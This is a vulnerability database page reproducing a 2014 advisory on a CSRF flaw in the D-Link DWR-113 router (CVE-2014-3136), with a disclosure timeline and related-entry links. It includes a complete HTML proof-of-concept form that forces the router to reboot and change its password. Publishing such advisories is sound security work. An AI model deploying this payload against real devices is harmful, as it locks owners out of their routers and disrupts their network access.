Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBlessen ThomasPACKETSTORM:127686
HistoryJul 30, 2014 - 12:00 a.m.

D-Link DWR-113 Cross Site Request Forgery

2014-07-3000:00:00
Blessen Thomas
packetstormsecurity.com
36

0.005 Low

EPSS

Percentile

76.9%

JSON
`Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service  
Google dork : N/A  
Exploit Author: Blessen Thomas  
Date : 29/07/14  
Vendor Homepage : http://www.dlink.com/  
Software Link : N/A  
Firmware version: v2.02 2013-03-13  
Tested on : Windows 7  
CVE : CVE-2014-3136  
Type of Application : Web application  
Release mode : Coordinated disclosure  
  
  
  
Vulnerability description:  
  
  
  
It was observed that the D-link DWR-113 wireless router is vulnerable to  
denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability.  
  
  
  
An attacker could craft a malicious CSRF exploit to change the password in  
the password functionality when the user(admin) is logged in to the  
application ,as the user interface (admin panel) lacks the csrf token or  
nonce to prevent an attacker to change the password.  
  
  
  
As a result, as soon as the crafted malicious exploit is executed the  
router is rebooted and the user could not login thus forcing to reset the  
router’s device physically ,leading to a denial of service condition.  
  
  
  
POC code (exploit) :  
  
  
  
*Restart Router by CSRF*  
  
  
  
<html>  
  
<!-- CSRF PoC --->  
  
<body>  
  
<form action="http://192.168.0.1/rebo.htm">  
  
<input type="hidden" name="S00010002" value="test" />  
  
<input type="hidden" name="np2" value="test" />  
  
<input type="hidden" name="N00150004" value="0" />  
  
<input type="hidden" name="N00150001" value="" />  
  
<input type="hidden" name="N00150003" value="1080" />  
  
<input type="hidden" name="_cce" value="0x80150002" />  
  
<input type="hidden" name="_sce" value="%Ssc" />  
  
<input type="submit" value="Submit request" />  
  
</form>  
  
</body>  
  
</html>  
  
  
  
  
  
Tools used :  
  
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5  
  
  
  
Timeline :  
  
  
  
06-04-14 : Contacted Vendor with details of Vulnerability and Exploit.  
  
  
  
06-04-14 : Vendor D-Link forwards to R&D team for review  
  
  
  
29-04-14 : Vendor contacted to know the status.  
  
  
  
01-05-14 : Vendor acknowledged and released a patch  
  
  
  
01-05-14 : CVE ID provided by Mitre team.  
  
  
  
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034  
  
  
`

Related

cve 1
zdt 1
exploitpack 1
nvd 1
seebug 1
prion 1
cvelist 1
exploitdb 1
cve
cve
CVE-2014-3136
2019-12-27 21:15:10
zdt
zdt
Dlink DWR-113 Rev. Ax - CSRF Denial of Service
2014-08-01 00:00:00
exploitpack
exploitpack
D-Link DWR-113 Rev. Ax - Cross-Site Request Forgery Denial of Service
2014-07-30 00:00:00
nvd
nvd
CVE-2014-3136
2019-12-27 21:15:10
seebug
seebug
Dlink DWR-113 Rev. Ax - CSRF Denial of Service
2014-08-04 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-12-27 21:15:00
cvelist
cvelist
CVE-2014-3136
2019-12-27 20:14:21
exploitdb
exploitdb
D-Link DWR-113 Rev. Ax - Cross-Site Request Forgery / Denial of Service
2014-07-30 00:00:00

0.005 Low

EPSS

Percentile

76.9%

JSON
Related for PACKETSTORM:127686
cve1zdt1exploitpack1nvd1seebug1prion1cvelist1exploitdb1